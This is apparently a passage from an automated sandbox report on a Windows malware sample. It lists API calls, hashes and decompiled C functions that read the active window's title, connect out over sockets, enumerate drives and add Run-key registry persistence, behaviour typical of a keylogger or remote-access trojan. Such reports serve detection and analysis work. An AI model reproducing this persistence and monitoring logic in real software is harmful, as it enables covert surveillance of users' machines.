                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: %02i:%02i:%02i:%03i $Q@
                                  • API String ID: 4249031962-3186260181
                                  • Opcode ID: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                  • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                  • Opcode Fuzzy Hash: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                  • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405812, Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                  • String ID:
                                  • API String ID: 257471410-0
                                  • Opcode ID: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                  • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                  • Opcode Fuzzy Hash: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                  • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F73, Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 30%
                                  			E00412F73(char _a4, void* _a20) {
				char _v5;
				void* _v24;
				char _v40;
				int _t26;
				int _t29;
				void* _t37;
				unsigned int _t66;
				signed int _t67;
				int _t70;
				signed short _t73;
				struct HWND__* _t81;
				void* _t83;

				_t81 = GetForegroundWindow();
				_t26 = GetWindowTextLengthA(_t81);
				_t89 = _t26;
				if(_t26 <= 0) {
					L6:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				}
				_t28 = _t26 + 1;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				E00413A29(_t29, _t29, _t29, __imp__tolower);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
				_t73 = 0;
				if(E00401838( &_v40) <= 0) {
					L5:
					E004017DD( &_v40);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L6;
				}
				_t82 = 0;
				while(1) {
					_t37 = E0040180C( &_v40, 0, _t82);
					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						break;
					}
					_t73 = _t73 + 1;
					_t82 = _t73 & 0x0000ffff;
					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
						continue;
					}
					goto L5;
				}
				__eflags = _a20;
				if(_a20 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					asm("repne scasb");
					_t66 =  !( &_v24 | 0xffffffff);
					_t83 = _t37 - _t66;
					_t67 = _t66 >> 2;
					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
					__eflags = _t70;
					memcpy(_t83 + _t67 + _t67, _t83, _t70);
				}
				E004017DD( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 1;
			}















                                  0x00412f81
                                  0x00412f84
                                  0x00412f8a
                                  0x00412f8c
                                  0x00413063
                                  0x00413066
                                  0x00000000
                                  0x0041306c
                                  0x00412f95
                                  0x00412f9d
                                  0x00412fa6
                                  0x00412fb0
                                  0x00412fb8
                                  0x00412fc7
                                  0x00412fd1
                                  0x00412fdb
                                  0x00412fe2
                                  0x00412ff2
                                  0x00413001
                                  0x0041300b
                                  0x00413016
                                  0x0041301f
                                  0x00413052
                                  0x00413055
                                  0x0041305d
                                  0x00000000
                                  0x0041305d
                                  0x00413021
                                  0x00413023
                                  0x00413029
                                  0x00413032
                                  0x00413040
                                  0x00000000
                                  0x00000000
                                  0x00413042
                                  0x00413046
                                  0x00413050
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00413050
                                  0x00413072
                                  0x00413076
                                  0x0041307b
                                  0x00413088
                                  0x0041308a
                                  0x00413090
                                  0x00413095
                                  0x0041309c
                                  0x0041309c
                                  0x0041309f
                                  0x0041309f
                                  0x004130a4
                                  0x004130ac
                                  0x004130b5
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                  • GetWindowTextA.USER32 ref: 00412FB8
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                  • String ID:
                                  • API String ID: 3496238640-0
                                  • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                  • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403744, Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                  • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                  • _itoa.MSVCRT ref: 0040377A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                  • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                  • String ID:
                                  • API String ID: 3966177967-0
                                  • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                  • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413C3F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                  0x00413c47
                                  0x00413c48
                                  0x00413d1c
                                  0x00413d2c
                                  0x00413d31
                                  0x00413d37
                                  0x00000000
                                  0x00413d37
                                  0x00413c4e
                                  0x00413c53
                                  0x00413d03
                                  0x00000000
                                  0x00000000
                                  0x00413d0c
                                  0x00413d14
                                  0x00413d14
                                  0x00413c5e
                                  0x00413c7a
                                  0x00413c7f
                                  0x00413cd1
                                  0x00413ceb
                                  0x00413cf7
                                  0x00413cd3
                                  0x00413cdb
                                  0x00413cdb
                                  0x00000000
                                  0x00413cd1
                                  0x00413c84
                                  0x00413c97
                                  0x00413ca0
                                  0x00413cbb
                                  0x00000000
                                  0x00413cbb
                                  0x00413c86
                                  0x00413c89
                                  0x00413c8c
                                  0x00413c69
                                  0x00000000
                                  0x00413c6c
                                  0x00413c60
                                  0x00413c63
                                  0x00413c66
                                  0x00000000

                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                  • GetCursorPos.USER32(?), ref: 00413C97
                                  • SetForegroundWindow.USER32(?), ref: 00413CA0
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                  • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                  • ExitProcess.KERNEL32 ref: 00413D14
                                  • CreatePopupMenu.USER32 ref: 00413D1C
                                  • AppendMenuA.USER32 ref: 00413D31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407D53, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                  0x00407d60
                                  0x00407d6a
                                  0x00407d71
                                  0x00407d7a
                                  0x00407d84
                                  0x00407d8c
                                  0x00407d99
                                  0x00407d9e
                                  0x00407da4
                                  0x00407da4
                                  0x00407dae
                                  0x00407db5
                                  0x00407dbe
                                  0x00407dc8
                                  0x00407dd0
                                  0x00407ddd
                                  0x00407de2
                                  0x00407de8
                                  0x00407de8
                                  0x00407df2
                                  0x00407e02
                                  0x00407e0c
                                  0x00407e21
                                  0x00407e2c
                                  0x00000000
                                  0x00407e2c
                                  0x00407e36

                                  APIs
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                    • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7D5
                                    • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7E3
                                    • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                    • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B801
                                    • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B810
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
